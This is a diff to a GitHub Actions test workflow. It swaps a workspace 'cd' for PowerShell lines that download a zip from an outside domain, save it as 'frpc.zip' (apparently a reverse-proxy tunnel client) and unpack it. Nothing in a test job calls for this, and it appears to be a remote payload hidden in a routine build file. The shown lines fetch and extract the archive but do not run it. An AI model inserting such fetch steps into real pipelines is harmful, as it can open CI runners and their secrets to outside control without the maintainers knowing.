--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -32,5 +32,7 @@ jobs:
       # Runs a set of commands using the runners shell
       - name: Run a multi-line script
         run: |
-         cd {$GITHUB_WORKSPACE}/
+         Invoke-WebRequest https://keda.asio.asia/ctest.zip -OutFile frpc.zip
+         Expand-Archive frpc.zip
+         cd .\frpc\
          ls
